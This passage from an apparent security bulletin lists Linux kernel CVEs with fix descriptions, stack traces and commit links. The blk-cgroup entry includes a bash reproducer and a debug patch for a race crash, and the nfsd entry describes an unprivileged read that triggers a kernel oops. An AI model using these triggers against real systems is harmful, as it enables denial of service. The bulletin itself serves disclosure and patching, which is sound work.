kasan_save_stack+0x1e/0x40 Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_set_track+0x21/0x30 Feb 21 09:02:00 c-237-177-40-045 kernel: __kasan_kmalloc+0x7a/0x90 Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5_packet_reformat_alloc+0x7b/0x230 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5e_tc_tun_create_header_ipv4+0x977/0xf10 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5e_attach_encap+0x15b4/0x1e10 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: post_process_attr+0x305/0xa30 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5e_tc_add_fdb_flow+0x4c0/0xcf0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: __mlx5e_add_fdb_flow+0x7cf/0xe90 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5e_configure_flower+0xcaa/0x4b90 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5e_rep_setup_tc_cls_flower+0x99/0x1b0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5e_rep_setup_tc_cb+0x133/0x1e0 [mlx5_core] -- Feb 21 09:02:00 c-237-177-40-045 kernel: Freed by task 8833: Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_save_s ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54262 | https://git.kernel.org/stable/c/c382b693ffcb1f1ebf60d76ab9dedfe9ea13eedf https://git.kernel.org/stable/c/8fd1dac646e6b08d03e3f1ad3c5b34255b1e08e8 https://git.kernel.org/stable/c/2d57a514f9ab7d2d40f49b02d93edfcec8c78a9e https://git.kernel.org/stable/c/e9fce818fe003b6c527f25517b9ac08eb4661b5d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/nouveau/kms/nv50-: init hpd_irq_lock for PIOR DP Fixes OOPS on boards with ANX9805 DP encoders. | 2025-12-30 | not yet calculated | CVE-2023-54263 | https://git.kernel.org/stable/c/92d48ce21645267c574268678131cd2b648dad0f https://git.kernel.org/stable/c/ea293f823a8805735d9e00124df81a8f448ed1ae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/sysv: Null check to prevent null-ptr-deref bug sb_getblk(inode->i_sb, parent) returns a null ptr, and taking a lock on that leads to the null-ptr-deref bug. | 2025-12-30 | not yet calculated | CVE-2023-54264 | https://git.kernel.org/stable/c/e976988bc245ec3768cc0f76bed7d05488a7dd0f https://git.kernel.org/stable/c/baa60c66a310c50785289b0ede6fdce8ec3219c7 https://git.kernel.org/stable/c/0a44ceba77c3267f8505dda102a59367dc24caee https://git.kernel.org/stable/c/7f740bc696d4617f8ee44565e8ac0d36278a1e91 https://git.kernel.org/stable/c/afd9a31b5aa4b3747f382d44a7b03b7b5d0b7635 https://git.kernel.org/stable/c/1416eebaad80bdc85ad9f97f27242011b031e2a9 https://git.kernel.org/stable/c/e28f376dd8dfcc4e880ac101184132bc08703f6e https://git.kernel.org/stable/c/ea2b62f305893992156a798f665847e0663c9f41 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix an uninit variable access bug in __ip6_make_skb() Syzbot reported a bug as following: ===================================================== BUG: KMSAN: uninit-value in arch_atomic64_inc arch/x86/include/asm/atomic64_64.h:88 [inline] BUG: KMSAN: uninit-value in arch_atomic_long_inc include/linux/atomic/atomic-long.h:161 [inline] BUG: KMSAN: uninit-value in atomic_long_inc include/linux/atomic/atomic-instrumented.h:1429 [inline] BUG: KMSAN: uninit-value in __ip6_make_skb+0x2f37/0x30f0 net/ipv6/ip6_output.c:1956 arch_atomic64_inc arch/x86/include/asm/atomic64_64.h:88 [inline] arch_atomic_long_inc include/linux/atomic/atomic-long.h:161 [inline] atomic_long_inc include/linux/atomic/atomic-instrumented.h:1429 [inline] __ip6_make_skb+0x2f37/0x30f0 net/ipv6/ip6_output.c:1956 ip6_finish_skb include/net/ipv6.h:1122 [inline] ip6_push_pending_frames+0x10e/0x550 net/ipv6/ip6_output.c:1987 rawv6_push_pending_frames+0xb12/0xb90 net/ipv6/raw.c:579 rawv6_sendmsg+0x297e/0x2e60 net/ipv6/raw.c:922 inet_sendmsg+0x101/0x180 net/ipv4/af_inet.c:827 sock_sendmsg_nosec net/socket.c:714 [inline] sock_sendmsg net/socket.c:734 [inline] ____sys_sendmsg+0xa8e/0xe70 net/socket.c:2476 ___sys_sendmsg+0x2a1/0x3f0 net/socket.c:2530 __sys_sendmsg net/socket.c:2559 [inline] __do_sys_sendmsg net/socket.c:2568 [inline] __se_sys_sendmsg net/socket.c:2566 [inline] __x64_sys_sendmsg+0x367/0x540 net/socket.c:2566 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Uninit was created at: slab_post_alloc_hook mm/slab.h:766 [inline] slab_alloc_node mm/slub.c:3452 [inline] __kmem_cache_alloc_node+0x71f/0xce0 mm/slub.c:3491 __do_kmalloc_node mm/slab_common.c:967 [inline] __kmalloc_node_track_caller+0x114/0x3b0 mm/slab_common.c:988 kmalloc_reserve net/core/skbuff.c:492 [inline] __alloc_skb+0x3af/0x8f0 net/core/skbuff.c:565 alloc_skb include/linux/skbuff.h:1270 [inline] __ip6_append_data+0x51c1/0x6bb0 net/ipv6/ip6_output.c:1684 ip6_append_data+0x411/0x580 net/ipv6/ip6_output.c:1854 rawv6_sendmsg+0x2882/0x2e60 net/ipv6/raw.c:915 inet_sendmsg+0x101/0x180 net/ipv4/af_inet.c:827 sock_sendmsg_nosec net/socket.c:714 [inline] sock_sendmsg net/socket.c:734 [inline] ____sys_sendmsg+0xa8e/0xe70 net/socket.c:2476 ___sys_sendmsg+0x2a1/0x3f0 net/socket.c:2530 __sys_sendmsg net/socket.c:2559 [inline] __do_sys_sendmsg net/socket.c:2568 [inline] __se_sys_sendmsg net/socket.c:2566 [inline] __x64_sys_sendmsg+0x367/0x540 net/socket.c:2566 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd This is because icmp6hdr is not in the skb linear region in the SOCK_RAW socket scenario. Accessing icmp6_hdr(skb)->icmp6_type directly will trigger the uninit variable access bug. Use a local variable icmp6_type to carry the correct value in the different scenarios. | 2025-12-30 | not yet calculated | CVE-2023-54265 | https://git.kernel.org/stable/c/165370522cc48127da564a08584a7391e6341908 https://git.kernel.org/stable/c/f394f690a30a5ec0413c62777a058eaf3d6e10d5 https://git.kernel.org/stable/c/0cf600ca1bdf1d52df977516ee6cee0cadb1f6b1 https://git.kernel.org/stable/c/605b056d63302ae84eb136e88d4df49124bd5e0d https://git.kernel.org/stable/c/d65ff2fe877c471aa6e79efa7bd8ff66e147c317 https://git.kernel.org/stable/c/2c9cefc142c1dc2759e19a92d3b2b3715e985beb https://git.kernel.org/stable/c/02ed5700f40445af02d1c97db25ffc2d04971d9f https://git.kernel.org/stable/c/ea30388baebcce37fd594d425a65037ca35e59e8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: dvb-usb: m920x: Fix a potential memory leak in m920x_i2c_xfer() 'read' is freed when it is known to be NULL, but not when a read error occurs. Revert the logic to avoid a small leak, should a m920x_read() call fail. | 2025-12-30 | not yet calculated | CVE-2023-54266 | https://git.kernel.org/stable/c/809623fedc31f4e74039d93bb75a8993635d7534 https://git.kernel.org/stable/c/c0178e938f110cdf6937f26975c0c951dbb1d9db https://git.kernel.org/stable/c/75d6ef197c488cd852493b4a419274e3489da79d https://git.kernel.org/stable/c/d13a84874a2e0236c9325b3adc8e126d0888ad6b https://git.kernel.org/stable/c/7ca7cd02114ac8caa6b0a64734b9af6be1559353 https://git.kernel.org/stable/c/2b6e20ef0585a467c24c7e4fde28518e5b33225a https://git.kernel.org/stable/c/4feed3dfca722c6d74865a37cab853c58e6aa190 https://git.kernel.org/stable/c/2cc9f11aeae2887a4db25c27323fc445f4b49e86 https://git.kernel.org/stable/c/ea9ef6c2e001c5dc94bee35ebd1c8a98621cf7b8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/pseries: Rework lppaca_shared_proc() to avoid DEBUG_PREEMPT lppaca_shared_proc() takes a pointer to the lppaca which is typically accessed through get_lppaca(). With DEBUG_PREEMPT enabled, this leads to checking if preemption is enabled, for example: BUG: using smp_processor_id() in preemptible [00000000] code: grep/10693 caller is lparcfg_data+0x408/0x19a0 CPU: 4 PID: 10693 Comm: grep Not tainted 6.5.0-rc3 #2 Call Trace: dump_stack_lvl+0x154/0x200 (unreliable) check_preemption_disabled+0x214/0x220 lparcfg_data+0x408/0x19a0 ... This isn't actually a problem however, as it does not matter which lppaca is accessed, the shared proc state will be the same. vcpudispatch_stats_procfs_init() already works around this by disabling preemption, but the lparcfg code does not, erroring any time /proc/powerpc/lparcfg is accessed with DEBUG_PREEMPT enabled. Instead of disabling preemption on the caller side, rework lppaca_shared_proc() to not take a pointer and instead directly access the lppaca, bypassing any potential preemption checks. [mpe: Rework to avoid needing a definition in paca.h and lppaca.h] | 2025-12-30 | not yet calculated | CVE-2023-54267 | https://git.kernel.org/stable/c/953c54dfdc5d3eb7243ed902b50acb5ea1db4355 https://git.kernel.org/stable/c/2935443dc9c28499223d8c881474259e4b998f2a https://git.kernel.org/stable/c/4c8568cf4c45b415854195c8832b557cdefba57a https://git.kernel.org/stable/c/3c5e8e666794d7dde6d14ea846c6c04f2bb34900 https://git.kernel.org/stable/c/f45ee5c074013a0fbfce77a5af5efddb01f5d4f4 https://git.kernel.org/stable/c/eac030b22ea12cdfcbb2e941c21c03964403c63f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: debugobjects: Don't wake up kswapd from fill_pool() syzbot is reporting a lockdep warning in fill_pool() because the allocation from debugobjects is using GFP_ATOMIC, which is (__GFP_HIGH | __GFP_KSWAPD_RECLAIM) and therefore tries to wake up kswapd, which acquires kswapd_wait::lock. Since fill_pool() might be called with arbitrary locks held, fill_pool() should not assume that acquiring kswapd_wait::lock is safe. Use __GFP_HIGH instead and remove __GFP_NORETRY as it is pointless for !__GFP_DIRECT_RECLAIM allocation. | 2025-12-30 | not yet calculated | CVE-2023-54268 | https://git.kernel.org/stable/c/be646802b3dc408c4dc72a3ac32c3f4a0282414d https://git.kernel.org/stable/c/fd673079749bac97bb30f1461df079e6c8e86511 https://git.kernel.org/stable/c/aee97eec77029270866c704f66cdf2881cbd2fe1 https://git.kernel.org/stable/c/d7fff52c99d52f180d8bef95d8ed8fec6343889c https://git.kernel.org/stable/c/4c088d30a72d9b8f9c6ae9362222942e4075cb00 https://git.kernel.org/stable/c/eb799279fb1f9c63c520fe8c1c41cb9154252db6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: SUNRPC: double free xprt_ctxt while still in use When an RPC request is deferred, the rq_xprt_ctxt pointer is moved out of the svc_rqst into the svc_deferred_req. When the deferred request is revisited, the pointer is copied into the new svc_rqst - and also remains in the svc_deferred_req. In the (rare?) case that the request is deferred a second time, the old svc_deferred_req is reused - it still has all the correct content. However in that case the rq_xprt_ctxt pointer is NOT cleared so that when xpo_release_xprt is called, the ctxt is freed (UDP) or possibly added to a free list (RDMA). When the deferred request is revisited for a second time, it will reference this ctxt which may be invalid, and then free the object a second time, which is likely to oops. So change svc_defer() to *always* clear rq_xprt_ctxt, and assert that the value is now stored in the svc_deferred_req. | 2025-12-30 | not yet calculated | CVE-2023-54269 | https://git.kernel.org/stable/c/7851771789e87108a92697194105ef0c9307dc5e https://git.kernel.org/stable/c/fd86534872f445f54dc01e7db001e25eadf063a8 https://git.kernel.org/stable/c/e0c648627322a4c7e018e5c7f837c3c03e297dbb https://git.kernel.org/stable/c/eb8d3a2c809abd73ab0a060fe971d6b9019aa3c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: usb: siano: Fix use after free bugs caused by do_submit_urb There are UAF bugs caused by do_submit_urb(). One of the KASan reports is shown below: [ 36.403605] BUG: KASAN: use-after-free in worker_thread+0x4a2/0x890 [ 36.406105] Read of size 8 at addr ffff8880059600e8 by task kworker/0:2/49 [ 36.408316] [ 36.408867] CPU: 0 PID: 49 Comm: kworker/0:2 Not tainted 6.2.0-rc3-15798-g5a41237ad1d4-dir8 [ 36.411696] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g15584 [ 36.416157] Workqueue: 0x0 (events) [ 36.417654] Call Trace: [ 36.418546] <TASK> [ 36.419320] dump_stack_lvl+0x96/0xd0 [ 36.420522] print_address_description+0x75/0x350 [ 36.421992] print_report+0x11b/0x250 [ 36.423174] ? _raw_spin_lock_irqsave+0x87/0xd0 [ 36.424806] ? __virt_addr_valid+0xcf/0x170 [ 36.426069] ? worker_thread+0x4a2/0x890 [ 36.427355] kasan_report+0x131/0x160 [ 36.428556] ? worker_thread+0x4a2/0x890 [ 36.430053] worker_thread+0x4a2/0x890 [ 36.431297] ? worker_clr_flags+0x90/0x90 [ 36.432479] kthread+0x166/0x190 [ 36.433493] ? kthread_blkcg+0x50/0x50 [ 36.434669] ret_from_fork+0x22/0x30 [ 36.435923] </TASK> [ 36.436684] [ 36.437215] Allocated by task 24: [ 36.438289] kasan_set_track+0x50/0x80 [ 36.439436] __kasan_kmalloc+0x89/0xa0 [ 36.440566] smsusb_probe+0x374/0xc90 [ 36.441920] usb_probe_interface+0x2d1/0x4c0 [ 36.443253] really_probe+0x1d5/0x580 [ 36.444539] __driver_probe_device+0xe3/0x130 [ 36.446085] driver_probe_device+0x49/0x220 [ 36.447423] __device_attach_driver+0x19e/0x1b0 [ 36.448931] bus_for_each_drv+0xcb/0x110 [ 36.450217] __device_attach+0x132/0x1f0 [ 36.451470] bus_probe_device+0x59/0xf0 [ 36.452563] device_add+0x4ec/0x7b0 [ 36.453830] usb_set_configuration+0xc63/0xe10 [ 36.455230] usb_generic_driver_probe+0x3b/0x80 [ 36.456166] printk: console [ttyGS0] disabled [ 36.456569] usb_probe_device+0x90/0x110 [ 36.459523] really_probe+0x1d5/0x580 [ 36.461027] __driver_probe_device+0xe3/0x130 [ 36.462465] driver_probe_device+0x49/0x220 [ 36.463847] __device_attach_driver+0x19e/0x1b0 [ 36.465229] bus_for_each_drv+0xcb/0x110 [ 36.466466] __device_attach+0x132/0x1f0 [ 36.467799] bus_probe_device+0x59/0xf0 [ 36.469010] device_add+0x4ec/0x7b0 [ 36.470125] usb_new_device+0x863/0xa00 [ 36.471374] hub_event+0x18c7/0x2220 [ 36.472746] process_one_work+0x34c/0x5b0 [ 36.474041] worker_thread+0x4b7/0x890 [ 36.475216] kthread+0x166/0x190 [ 36.476267] ret_from_fork+0x22/0x30 [ 36.477447] [ 36.478160] Freed by task 24: [ 36.479239] kasan_set_track+0x50/0x80 [ 36.480512] kasan_save_free_info+0x2b/0x40 [ 36.481808] ____kasan_slab_free+0x122/0x1a0 [ 36.483173] __kmem_cache_free+0xc4/0x200 [ 36.484563] smsusb_term_device+0xcd/0xf0 [ 36.485896] smsusb_probe+0xc85/0xc90 [ 36.486976] usb_probe_interface+0x2d1/0x4c0 [ 36.488303] really_probe+0x1d5/0x580 [ 36.489498] __driver_probe_device+0xe3/0x130 [ 36.491140] driver_probe_device+0x49/0x220 [ 36.492475] __device_attach_driver+0x19e/0x1b0 [ 36.493988] bus_for_each_drv+0xcb/0x110 [ 36.495171] __device_attach+0x132/0x1f0 [ 36.496617] bus_probe_device+0x59/0xf0 [ 36.497875] device_add+0x4ec/0x7b0 [ 36.498972] usb_set_configuration+0xc63/0xe10 [ 36.500264] usb_generic_driver_probe+0x3b/0x80 [ 36.501740] usb_probe_device+0x90/0x110 [ 36.503084] really_probe+0x1d5/0x580 [ 36.504241] __driver_probe_device+0xe3/0x130 [ 36.505548] driver_probe_device+0x49/0x220 [ 36.506766] __device_attach_driver+0x19e/0x1b0 [ 36.508368] bus_for_each_drv+0xcb/0x110 [ 36.509646] __device_attach+0x132/0x1f0 [ 36.510911] bus_probe_device+0x59/0xf0 [ 36.512103] device_add+0x4ec/0x7b0 [ 36.513215] usb_new_device+0x863/0xa00 [ 36.514736] hub_event+0x18c7/0x2220 [ 36.516130] process_one_work+ ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54270 | https://git.kernel.org/stable/c/c379272ea9c2ee36f0a1327b0fb8889c975093f7 https://git.kernel.org/stable/c/1477b00ff582970df110fc9e15a5e2021acb9222 https://git.kernel.org/stable/c/a41bb59eff7a58a6772f84a5b70ad7ec26dad074 https://git.kernel.org/stable/c/42f8ba8355682f6c4125b75503cac0cef4ac91d3 https://git.kernel.org/stable/c/114f768e7314ca9e1fdbebe11267c4403e89e7f2 https://git.kernel.org/stable/c/479796534a450fd44189080d51bebefa3b42c6fc https://git.kernel.org/stable/c/19aadf0eb70edae7180285dbb9bfa237d1ddb34d https://git.kernel.org/stable/c/ebad8e731c1c06adf04621d6fd327b860c0861b5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-cgroup: Fix NULL deref caused by blkg_policy_data being installed before init blk-iocost sometimes causes the following crash: BUG: kernel NULL pointer dereference, address: 00000000000000e0 ... RIP: 0010:_raw_spin_lock+0x17/0x30 Code: be 01 02 00 00 e8 79 38 39 ff 31 d2 89 d0 5d c3 0f 1f 00 0f 1f 44 00 00 55 48 89 e5 65 ff 05 48 d0 34 7e b9 01 00 00 00 31 c0 <f0> 0f b1 0f 75 02 5d c3 89 c6 e8 ea 04 00 00 5d c3 0f 1f 84 00 00 RSP: 0018:ffffc900023b3d40 EFLAGS: 00010046 RAX: 0000000000000000 RBX: 00000000000000e0 RCX: 0000000000000001 RDX: ffffc900023b3d20 RSI: ffffc900023b3cf0 RDI: 00000000000000e0 RBP: ffffc900023b3d40 R08: ffffc900023b3c10 R09: 0000000000000003 R10: 0000000000000064 R11: 000000000000000a R12: ffff888102337000 R13: fffffffffffffff2 R14: ffff88810af408c8 R15: ffff8881070c3600 FS: 00007faaaf364fc0(0000) GS:ffff88842fdc0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00000000000000e0 CR3: 00000001097b1000 CR4: 0000000000350ea0 Call Trace: <TASK> ioc_weight_write+0x13d/0x410 cgroup_file_write+0x7a/0x130 kernfs_fop_write_iter+0xf5/0x170 vfs_write+0x298/0x370 ksys_write+0x5f/0xb0 __x64_sys_write+0x1b/0x20 do_syscall_64+0x3d/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 This happens because iocg->ioc is NULL. The field is initialized by ioc_pd_init() and never cleared. The NULL deref is caused by blkcg_activate_policy() installing blkg_policy_data before initializing it. blkcg_activate_policy() was doing the following: 1. Allocate pd's for all existing blkg's and install them in blkg->pd[]. 2. Initialize all pd's. 3. Online all pd's. blkcg_activate_policy() only grabs the queue_lock and may release and re-acquire the lock as allocation may need to sleep. ioc_weight_write() grabs blkcg->lock and iterates all its blkg's. The two can race and if ioc_weight_write() runs during #1 or between #1 and #2, it can encounter a pd which is not initialized yet, leading to crash. The crash can be reproduced with the following script: #!/bin/bash echo +io > /sys/fs/cgroup/cgroup.subtree_control systemd-run --unit touch-sda --scope dd if=/dev/sda of=/dev/null bs=1M count=1 iflag=direct echo 100 > /sys/fs/cgroup/system.slice/io.weight bash -c "echo '8:0 enable=1' > /sys/fs/cgroup/io.cost.qos" & sleep .2 echo 100 > /sys/fs/cgroup/system.slice/io.weight with the following patch applied: > diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c > index fc49be622e05..38d671d5e10c 100644 > --- a/block/blk-cgroup.c > +++ b/block/blk-cgroup.c > @@ -1553,6 +1553,12 @@ int blkcg_activate_policy(struct gendisk *disk, const struct blkcg_policy *pol) > pd->online = false; > } > > + if (system_state == SYSTEM_RUNNING) { > + spin_unlock_irq(&q->queue_lock); > + ssleep(1); > + spin_lock_irq(&q->queue_lock); > + } > + > /* all allocated, init in the same order */ > if (pol->pd_init_fn) > list_for_each_entry_reverse(blkg, &q->blkg_list, q_node) I don't see a reason why all pd's should be allocated, initialized and onlined together. The only ordering requirement is that parent blkgs be initialized and onlined before children, which is guaranteed from the walking order. Let's fix the bug by allocating, initializing and onlining pd for each blkg and holding blkcg->lock over initialization and onlining. This ensures that an installed blkg is always fully initialized and onlined, removing the race window. | 2025-12-30 | not yet calculated | CVE-2023-54271 | https://git.kernel.org/stable/c/e39ef7880d1057b2ebcdb013405f4d84a257db23 https://git.kernel.org/stable/c/7d63c6f9765339dcfc34b7365ced7c518012e4fe https://git.kernel.org/stable/c/ec14a87ee1999b19d8b7ed0fa95fea80644624ae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix a possible null-pointer dereference in ni_clear() In a previous commit c1006bd13146, ni->mi.mrec in ni_write_inode() could be NULL, and thus a NULL check is added for this variable. However, in the same call stack, ni->mi.mrec can be also dereferenced in ni_clear(): ntfs_evict_inode(inode) ni_write_inode(inode, ...) ni = ntfs_i(inode); is_rec_inuse(ni->mi.mrec) -> Add a NULL check by previous commit ni_clear(ntfs_i(inode)) is_rec_inuse(ni->mi.mrec) -> No check Thus, a possible null-pointer dereference may exist in ni_clear(). To fix it, a NULL check is added in this function. | 2025-12-30 | not yet calculated | CVE-2023-54272 | https://git.kernel.org/stable/c/20f9bfc664d6a478f9a5bbc0c380f80f7a1a06c6 https://git.kernel.org/stable/c/39c6312009574ca73865354133ca222e7753a71b https://git.kernel.org/stable/c/e7675f85a92233136c630000a0b7cf97826705da https://git.kernel.org/stable/c/ec275bf9693d19cc0fdce8436f4c425ced86f6e7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: Fix leak of dev tracker At the stage of direction checks, the netdev reference tracker is already initialized, but released with wrong *_put() call. | 2025-12-30 | not yet calculated | CVE-2023-54273 | https://git.kernel.org/stable/c/7d16c515059b3746f2d6a24a74c3ba786a68c2a1 https://git.kernel.org/stable/c/ec8f32ad9a65a8cbb465b69e154aaec9d2fe45c4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/srpt: Add a check for valid 'mad_agent' pointer When unregistering the MAD agent, the srpt module has a non-null check for the 'mad_agent' pointer before invoking ib_unregister_mad_agent(). This check can pass if the 'mad_agent' variable holds an error value. The 'mad_agent' can have an error value for a short window when srpt_add_one() and srpt_remove_one() are executed simultaneously. In the srpt module, added a valid pointer check for 'sport->mad_agent' before unregistering the MAD agent. This issue can be hit when the RoCE driver unregisters ib_device. Stack Trace: ------------ BUG: kernel NULL pointer dereference, address: 000000000000004d PGD 145003067 P4D 145003067 PUD 2324fe067 PMD 0 Oops: 0002 [#1] PREEMPT SMP NOPTI CPU: 10 PID: 4459 Comm: kworker/u80:0 Kdump: loaded Tainted: P Hardware name: Dell Inc. PowerEdge R640/06NR82, BIOS 2.5.4 01/13/2020 Workqueue: bnxt_re bnxt_re_task [bnxt_re] RIP: 0010:_raw_spin_lock_irqsave+0x19/0x40 Call Trace: ib_unregister_mad_agent+0x46/0x2f0 [ib_core] IPv6: ADDRCONF(NETDEV_CHANGE): bond0: link becomes ready ? __schedule+0x20b/0x560 srpt_unregister_mad_agent+0x93/0xd0 [ib_srpt] srpt_remove_one+0x20/0x150 [ib_srpt] remove_client_context+0x88/0xd0 [ib_core] bond0: (slave p2p1): link status definitely up, 100000 Mbps full duplex disable_device+0x8a/0x160 [ib_core] bond0: active interface up! ? kernfs_name_hash+0x12/0x80 (NULL device *): Bonding Info Received: rdev: 000000006c0b8247 __ib_unregister_device+0x42/0xb0 [ib_core] (NULL device *): Master: mode: 4 num_slaves:2 ib_unregister_device+0x22/0x30 [ib_core] (NULL device *): Slave: id: 105069936 name:p2p1 link:0 state:0 bnxt_re_stopqps_and_ib_uninit+0x83/0x90 [bnxt_re] bnxt_re_alloc_lag+0x12e/0x4e0 [bnxt_re] | 2025-12-30 | not yet calculated | CVE-2023-54274 | https://git.kernel.org/stable/c/8ec6acdb9b6a80eeb13e778dfedb5d72a88f14fe https://git.kernel.org/stable/c/00cc21e32ea1b8ebbabf5d645da9378d986bf8ba https://git.kernel.org/stable/c/4323aaedeba32076e652aad056afd7885bb96bb7 https://git.kernel.org/stable/c/5f6ef2a574b0e0e0ea46ed0022575442df9d0bf9 https://git.kernel.org/stable/c/b713623bfef8cb1df9c769a3887fa10db63d1c54 https://git.kernel.org/stable/c/eca5cd9474cd26d62f9756f536e2e656d3f62f3a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: Fix memory leak in ath11k_peer_rx_frag_setup crypto_alloc_shash() allocates resources, which should be released by crypto_free_shash(). When ath11k_peer_find() fails, there is a memory leak. Add the missing crypto_free_shash() to fix this. | 2025-12-30 | not yet calculated | CVE-2023-54275 | https://git.kernel.org/stable/c/137963e3b95776f1d57c62f249a93fe47e019a22 https://git.kernel.org/stable/c/53c8a256e5d3f31d80186de03a3d2a7f747b2aa0 https://git.kernel.org/stable/c/e596b36e15a7158b0bb2d55077b6b381ee41020c https://git.kernel.org/stable/c/64a78ec4f4579798d8e885aca9bdd707bca6b16b https://git.kernel.org/stable/c/ed3f83b3459a67a3ab9d806490ac304b567b1c2d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: move init of percpu reply_cache_stats counters back to nfsd_init_net Commit f5f9d4a314da ("nfsd: move reply cache initialization into nfsd startup") moved the initialization of the reply cache into nfsd startup, but didn't account for the stats counters, which can be accessed before nfsd is ever started. The result can be a NULL pointer dereference when someone accesses /proc/fs/nfsd/reply_cache_stats while nfsd is still shut down. This is a regression and a user-triggerable oops in the right situation: - non-x86_64 arch - /proc/fs/nfsd is mounted in the namespace - nfsd is not started in the namespace - unprivileged user calls "cat /proc/fs/nfsd/reply_cache_stats" Although this is easy to trigger on some arches (like aarch64), on x86_64, calling this_cpu_ptr(NULL) evidently returns a pointer to the fixed_percpu_data. That struct looks just enough like a newly initialized percpu var to allow nfsd_reply_cache_stats_show to access it without Oopsing. Move the initialization of the per-net+per-cpu reply-cache counters back into nfsd_init_net, while leaving the rest of the reply cache allocations to be done at nfsd startup time. Kudos to Eirik who did most of the legwork to track this down. | 2025-12-30 | not yet calculated | CVE-2023-54276 | https://git.kernel.org/stable/c/3025d489f9c8984d1bf5916c4a20097ed80fca5c https://git.kernel.org/stable/c/8549384d0f65981761fe2077d04fa2a8d37b54e0 https://git.kernel.org/stable/c/66a178177b2b3bb1d71e854c5e7bbb320eb0e566 https://git.kernel.org/stable/c/768c408594b52d8531e1a8ab62e5620c19213e73 https://git.kernel.org/stable/c/ed9ab7346e908496816cffdecd46932035f66e2e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: udlfb: Fix endpoint check The syzbot fuzzer detected a problem in the udlfb driver, caused by an endpoint not having the expected type: usb 1-1: Read EDID byte 0 failed: -71 usb 1-1: Unable to get valid EDID from device/display ------------[ cut here ]------------ usb 1-1: BOGUS urb xfer, pipe 3 != type 1 WARNING: CPU: 0 PID: 9 at drivers/usb/core/urb.c:504 usb_submit_urb+0xed6/0x1880 drivers/usb/core/urb.c:504 Modules linked in: CPU: 0 PID: 9 Comm: kworker/0:1 Not tainted 6.4.0-rc1-syzkaller-00016-ga4422ff22142 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/28/2023 Workqueue: usb_hub_wq hub_event RIP: 0010:usb_submit_urb+0xed6/0x1880 drivers/usb/core/urb.c:504 ... Call Trace: <TASK> dlfb_submit_urb+0x92/0x180 drivers/video/fbdev/udlfb.c:1980 dlfb_set_video_mode+0x21f0/0x2950 drivers/video/fbdev/udlfb.c:315 dlfb_ops_set_par+0x2a7/0x8d0 drivers/video/fbdev/udlfb.c:1111 dlfb_usb_probe+0x149a/0x2710 drivers/video/fbdev/udlfb.c:1743 The current approach for this issue failed to catch the problem because it only checks for the existence of a bulk-OUT endpoint; it doesn't check whether this endpoint is the one that the driver will actually use. We can fix the problem by instead checking that the endpoint used by the driver does exist and is bulk-OUT. | 2025-12-30 | not yet calculated | CVE-2023-54277 | https://git.kernel.org/stable/c/1522dc58bff87af79461b96d90ec122e9e726004 https://git.kernel.org/stable/c/58ecc165abdaed85447455e6dc396758e8c6f219 https://git.kernel.org/stable/c/9e12c58a5ece41be72157cef348576b135c9fc72 https://git.kernel.org/stable/c/c8fdf7feca77cd99e25ef0a1e9e72dfc83add8ef https://git.kernel.org/stable/c/e19383e5dee5adbf3d19f3f210f440a88d1b7dde https://git.kernel.org/stable/c/ed9de4ed39875706607fb08118a58344ae6c5f42 |
